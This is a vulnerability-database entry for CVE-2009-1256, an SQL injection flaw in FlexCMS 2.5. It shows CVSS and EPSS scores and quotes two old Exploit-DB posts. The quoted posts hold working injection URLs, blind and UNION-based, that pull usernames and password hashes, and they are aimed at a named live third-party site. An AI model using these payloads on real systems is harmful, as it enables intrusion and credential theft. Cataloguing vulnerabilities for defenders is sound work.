CVE-2009-1256
published 2009-04-07CVE-2009-1256: SQL injection vulnerability in FlexCMS 2.5 allows remote attackers to execute arbitrary SQL commands via the ItemId parameter. NOTE: some of these details are…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.00%
58.3th percentile
SQL injection vulnerability in FlexCMS 2.5 allows remote attackers to execute arbitrary SQL commands via the ItemId parameter. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flexcms | flexcms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
FlexCMS Calendar - 'itemID' Blind SQL Injection
exploitdb·2009-04-06
CVE-2009-1256 FlexCMS Calendar - 'itemID' Blind SQL Injection
FlexCMS Calendar - 'itemID' Blind SQL Injection
---
* *
* FlexCMS Calendar(ItemId) Blind SQL Injection Vulnerability *
* *
AUTHOR: MisterRichard
Developer site: http://www.flexcms.dk/
Admin login site:
http://target.com/flexadmin/
[=] Vulnerability author : Lanti-Net
[=] Contact: lanti-net[at]hotmail[dot]com
[=] Site : www.khg-crew.ws
[=] Greetz: SpYrO , boom3rang, KHG, urtan, H!tm@N , war_ning, chs, redc00de , LiTTlE-HaCkEr , L1R1D0N1
[=] -=[Kosova Hackers Group]=--=[KHG-Crew]=-
[=] Example : /flx/aktiviteter/kalender/?ItemId={SQL}
http://www.radikalungdom.dk/flx/aktiviteter/kalender/?ItemId=1%20and%20substring(@@version,1,1)=4 >>FALSE
[=] Live Demo: http://www.radikalungdom.dk/flx/aktiviteter/kalender/?ItemId=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from
Exploit-DB
FlexCMS 2.5 - 'catId' SQL Injection
exploitdb·2009-02-09
CVE-2009-1256 FlexCMS 2.5 - 'catId' SQL Injection
FlexCMS 2.5 - 'catId' SQL Injection
---
AUTHOR: MisterRichard
FlexCMS Remote SQL Injection
Discovered by MisterRichard.
Developer site: http://www.flexcms.dk/
Developer has not been notified.
Live demo:
Injection: www.target.com/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--
http://www.radikalungdom.dk/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--
Admin login site:
http://target.com/flexadmin/
Greetz, agonx, kollek, cardingnu
# milw0rm.com [2009-02-09]
No writeups or analysis indexed.
2009-04-07
Published